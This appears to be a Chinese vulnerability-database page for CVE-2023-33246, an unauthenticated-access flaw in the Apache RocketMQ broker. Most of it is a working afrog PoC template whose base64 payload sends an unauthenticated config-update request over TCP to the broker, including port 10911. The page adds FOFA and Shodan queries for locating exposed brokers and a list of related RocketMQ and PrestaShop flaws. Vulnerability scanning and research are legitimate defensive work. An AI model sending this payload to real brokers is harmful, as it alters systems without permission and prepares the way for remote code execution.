CVE-2023-33246: RocketMQ broker unauthorized

日期: 2025-09-01 | 影响软件: RocketMQ | POC: 已公开

漏洞描述

Apache Rocketmq Unauthenticated Access were detected. FOFA: protocol="rocketmq" SHODAN: title:"RocketMQ"

PoC代码[已公开]

id: CVE-2023-33246

info:
  name: RocketMQ broker unauthorized
  author: xpoc,j4vaovo
  severity: critical
  verified: true
  description: |
    Apache Rocketmq Unauthenticated Access were detected. 
    FOFA: protocol="rocketmq"
    SHODAN: title:"RocketMQ"
  reference:
    - https://stack.chaitin.com/techblog/detail/104
    - https://rocketmq.apache.org/docs/bestPractice/03access
    - https://github.com/SuperZero/CVE-2023-33246
  tags: network,rocketmq,broker,apache,unauth
  created: 2023/06/22

set:
  hostname: request.url.host
  host: request.url.domain
  payload: base64Decode('AAAAyQAAALF7ImNvZGUiOjI1LCJleHRGaWVsZHMiOnsiQWNjZXNzS2V5Ijoicm9ja2V0bXEyIiwiU2lnbmF0dXJlIjoiK3pkUmRVdWF6aVNRa0hVVXFkcnR3ZzFGOGprPSJ9LCJmbGFnIjowLCJsYW5ndWFnZSI6IkpBVkEiLCJvcGFxdWUiOjAsInNlcmlhbGl6ZVR5cGVDdXJyZW50UlBDIjoiSlNPTiIsInZlcnNpb24iOjQzM310ZXN0X2tleT10ZXN0X3ZhbHVlCg==')
rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      data: "{{payload}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
  r1:
    request:
      type: tcp
      host: "{{host}}:10911"
      data: "{{payload}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
expression: r0() || r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-33246.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2023-37582: Apache RocketMQ 远程命令执行漏洞 POC

CVE-2023-33246: RocketMQ <= 5.1.0 - Remote Code Execution POC

RocketMQ / 未授权访问漏洞 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

RocketMQ / 未授权访问漏洞无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC